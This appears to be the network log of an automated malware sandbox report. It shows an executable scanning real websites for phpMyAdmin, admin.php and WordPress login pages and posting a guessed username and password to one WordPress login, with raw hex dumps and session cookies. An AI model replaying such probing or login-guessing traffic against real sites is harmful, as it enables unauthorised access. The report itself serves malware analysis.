                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1021INData Raw: 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63
                                                                                                                                                                                                    Data Ascii: 3F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type" c
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC8200INData Raw: 32 30 30 30 0d 0a 74 6d 65 6e 74 2e 63 6f 6d 22 3e 0a 3c 21 2d 2d 20 65 6e 64 20 63 61 6e 6f 6e 69 63 61 6c 20 6c 69 6e 6b 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 72 65 6d 61 72 6b 3a 20 73 74 61 72 74 20 4a 53 72 65 70 6f 73 69 74 6f 72 79 20 61 75 74 6f 20 67 65 6e 65 72 61 74 65 64 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 5f 6a 61 76 61 73 63 72 69 70 74 5f 67 6c 6f 62 61 6c 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 5f 6a 61 76 61 73 63 72 69 70 74 5f 67 6c 6f 62 61 6c 2f 63 68 6f 73
                                                                                                                                                                                                    Data Ascii: 2000tment.com">... end canonical link -->... remark: start JSrepository auto generated --><script src="https://www.beachrecruitment.com/_javascript_global/jquery.js"></script><script src="https://www.beachrecruitment.com/_javascript_global/chos
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC4308INData Raw: 31 30 43 43 0d 0a 39 34 36 37 38 2f 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22
                                                                                                                                                                                                    Data Ascii: 10CC94678/cat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920" height="
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC13295INData Raw: 33 33 45 37 0d 0a 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 43 68 61 70 6f 22 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 6a 73 6c 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 54 69 74 6c 65 20 6a 73 6c 46 75 6e 63 74 69 6f 6e 4e 61 6d 65 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65
                                                                                                                                                                                                    Data Ascii: 33E7<div class="hookItemWord jslKeyword jslChapo"></div><div class="jslCleaner jslKwCleaner"></div></div><div class="hookItemContainer jslItemContainer"><div class="hookItemTitle jslFunctionName"><a href="https://www.beachre
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    324192.168.2.463590199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1277OUTGET /phpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6InRCT085QUZJRjFua2xuMDJDT3JmbHc9PSIsInZhbHVlIjoiM3VwZ1JLbGxsM1JCcFR0U1RHbFZ4Wmk1OXNLN2ZLZ1BCa3Ezemo4Q2JnaFc1SnJ5OGt0ajUyRFpXc1ZlZkgyc002aEdTcWVIeldKVEdTT3hrZEhyQkxnOW45M3BxbHFoZFJTVlA2MHRkQUdud1RoM3hFc2R1TllxRE1DbWFQc0YiLCJtYWMiOiIzYzAwYjY4YWEyNjk2YTU4NDZjYmJlN2ZkOWEwNjQxMTY5YTVkYTg2NzA4MDhlNWNkZDQwMTRhYjMwNDhlN2IyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6ImdiYkFhd05JR2E4T1V1QzU0RmJ0R1E9PSIsInZhbHVlIjoiZ1dZODltbm1WZkZRajlLRjFpVVV6VXBiZWtJdWlpWitLRXd6V09BMHMvcHh0Si9LRG81QjBGelNBRnlLTDZPcHdaMTZqV0hldnFXZ2pWTEZPOTlzRC9maFJOMk5WQmNhNjlabTVCTktsVzYrdWpJb000SmhCMU16Z0hUQ1o3RXkiLCJtYWMiOiJhMTMzN2U5N2RhYjc0MmQwNmQyYjhjZWYzZGQ2ZGZjNWJhZDM0OWFiODU1MTFmZjYyYjA4ZmI1ZmE0NDI5YTkzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJZU3NLbzFKdGUxMkI3Nm1jTjNaREE9PSIsInZhbHVlIjoidlEwV0taUnFVb1JOeXVHM2V6bXNaM3pEeWJSejdRUEE4R0cxcTYzZjVBYXYxVCs2elVaMW9MUFhESGVRa3RDQlY1R0lSVlA1bFJBWWJPRDNkaTBrRGl2amlDc0NoVFlpUjEvc25HeHFEaXc2N2ZrUk5DTmNteTFqZ3JWMnVaRDgiLCJtYWMiOiI2NTc0MTQyNjdkYzE4YWYwOTU3NDk3YzVjMTdlOWRkYmQ3MjMxMDBjNGUwMGVhMGRiN2U0Yzc5YTM5OTQ5YjI2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1135INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:41 GMTLocation: https://www.gatewaytoearlylearning.com/phpMyAdminSet-Cookie: publis
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 59 77 4f 56 5a 71 61 46 4a 48 52 47 52 5a 61 7a 56 4b 5a 6e 5a 79 53 55 5a 47 65 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 7a 56 43 53 32 46 69 55 48 46 4d 51 30 74 43 65 54 6c 61 51 57 35 55 63 47 74 7a 5a 31 4e 4b 4f 56 5a 33 64 47 64 59 4d 32 4e 4c 55 45 46 45 4d 54 68 4b 53 54 42 6e 55 57 5a 36 53 56 52 4b 65 48 46 32 4d 7a 63 78 54 33 68 77 52 30 31 57 59 57 35 4b 52 69 39 34 61 48 4e 30 52 32 70 77 5a 58 6b 32 64 55 52 69 4e 6d 67 79 4e 44 63 33 55 55 34 77 53 45 78 70 4d 54 55 32 4b 7a 64 77 63 33 42 35 4e 6d 4e 57 54 54 55 79 65 58 4a 7a 57 55 67 33 53 48 42 68 65 47 6f 33 63 55 35 79 65 47 46 72 4e 46
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6InYwOVZqaFJHRGRZazVKZnZySUZGeUE9PSIsInZhbHVlIjoiMzVCS2FiUHFMQ0tCeTlaQW5UcGtzZ1NKOVZ3dGdYM2NLUEFEMThKSTBnUWZ6SVRKeHF2MzcxT3hwR01WYW5KRi94aHN0R2pwZXk2dURiNmgyNDc3UU4wSExpMTU2Kzdwc3B5NmNWTTUyeXJzWUg3SHBheGo3cU5yeGFrNF
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC454INData Raw: 31 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 4d 79 41 64
                                                                                                                                                                                                    Data Ascii: 1ba<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/phpMyAdmin'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/phpMyAd


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    325192.168.2.463586199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1276OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6ImU4M05CeFdURWNUc0ZzQ2dqN1lFT3c9PSIsInZhbHVlIjoiaVhaYitWU0NGcUtJbFVXbHZDeTFZb3BvdXh5Y1dVajl2VDJEaXYrR29OVlJuWmVDUnB1SkZEVGN4NFVIak5CekRjdXdzVkd3R25zSWZXcVo5akRja0hsWDhNbzVCSGYwalk4QmxQWENlYzJQdDZLUGRIVm5QNTBhYiszNXkxTGkiLCJtYWMiOiJmOTVmY2Y3NzZjN2M0NTRkNGMxNDdmYWYxZjI1YzVlM2QxZmZlMDgwMmMzOGYzNjg4ZTE5YjNlZTMxNGI4MTQ2IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InF3ZngrWVg5clBjRjFERUZvRVFCREE9PSIsInZhbHVlIjoiQjFQMzd6RTJFS0ovK2VYVVhaaUFWQjQxODRsWXA0RkZxUGZEWEhBZWFMK0tUTHNoZkVjQUJ5OE1BVHlPTThRbFlIaXNVL1JtRFllb2l3R0tLdURtZUkrVWIxL1AvR0hqdmRBWGNHSlFFWng1NzlTRmZ6QWFzZVFFRUdmalNieWgiLCJtYWMiOiJhYWJjOWRjYWY4NDFhNjhkMDY5MzM0YzQ1NTIxMTNhMGRjZDZkMmUxZTRkYzBlZGNmMDFhMjFhODk3Y2I3YjIzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Im5paEdlSlh3eDllRmZqM2VhVG5XbGc9PSIsInZhbHVlIjoiaTd1VWNrcEdXenVERFhjUEtQVFdzekd3a1ptYkZ3RE5lZ0NQdmtuYmE3U0pGZmVGNERmRWI2TzJWQnQvelArMUM5TEI1bHZSNnZHMGhuVkZseFd3am9ZSFNFNzQrbGRKSTNYeUV6VVJ2bUhHalFJY1lyWXRpK0lRQjdwZFlEdnUiLCJtYWMiOiI0NjM2ZjFlNjMzMDEyMDdhOGY0NTNmZTMyODdmMDhkZDk3NDBlZDMwMGQxNTI2Nzk2YTBiMDIxYzM0OWM0NGI2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1134INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68 70 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:41 GMTLocation: https://www.gatewaytoearlylearning.com/admin.phpSet-Cookie: publish
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 45 32 63 6a 6b 35 62 46 52 79 59 6a 42 6f 4b 33 4d 76 51 56 6c 42 56 6c 70 42 55 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 57 56 44 62 47 4e 6d 53 45 31 4b 65 6b 64 74 4b 33 56 75 59 32 38 72 4e 6d 4a 4a 4d 45 6c 73 62 55 31 33 4e 6d 56 50 4f 47 31 33 64 33 4a 48 4e 31 70 54 56 47 30 33 65 6d 56 75 55 48 56 61 4e 47 4e 73 63 46 56 30 59 6d 35 74 62 32 59 7a 5a 44 6c 74 62 45 77 72 54 48 56 54 57 58 64 30 4e 44 41 72 57 47 5a 36 5a 56 42 6f 54 48 5a 4c 63 46 5a 77 55 6c 4a 74 65 57 4d 78 56 47 52 56 65 47 56 49 51 6b 4e 4f 53 45 6c 6a 64 47 39 61 62 58 52 6e 57 6b 4e 4e 53 32 70 45 5a 32 35 36 5a 79 74 70 64 45
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IlE2cjk5bFRyYjBoK3MvQVlBVlpBUFE9PSIsInZhbHVlIjoicWVDbGNmSE1KekdtK3VuY28rNmJJMElsbU13NmVPOG13d3JHN1pTVG03emVuUHVaNGNscFV0Ym5tb2YzZDltbEwrTHVTWXd0NDArWGZ6ZVBoTHZLcFZwUlJteWMxVGRVeGVIQkNOSEljdG9abXRnWkNNS2pEZ256ZytpdE
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC450INData Raw: 31 62 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68 70 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68
                                                                                                                                                                                                    Data Ascii: 1b6<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/admin.php'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/admin.ph


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    326192.168.2.462899164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC4130INData Raw: 31 30 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 101a<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC2144INData Raw: 38 35 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 30 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 2e 32 22 20 69 64
                                                                                                                                                                                                    Data Ascii: 859<script type="text/javascript" src="https://gccb.co.in/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script><script type="text/javascript" src="https://gccb.co.in/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2" id
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    327192.168.2.46398034.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC401OUTPOST /wp-login.php?wpe-login=true HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=4b891e4bf86cbb4d9abf191d2f37b534
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 123
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC123OUTData Raw: 6c 6f 67 3d 68 68 26 70 77 64 3d 30 39 38 70 6f 69 30 39 38 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=hh&pwd=098poi098&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftiswheels.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC517INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 36 32 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72 61 67
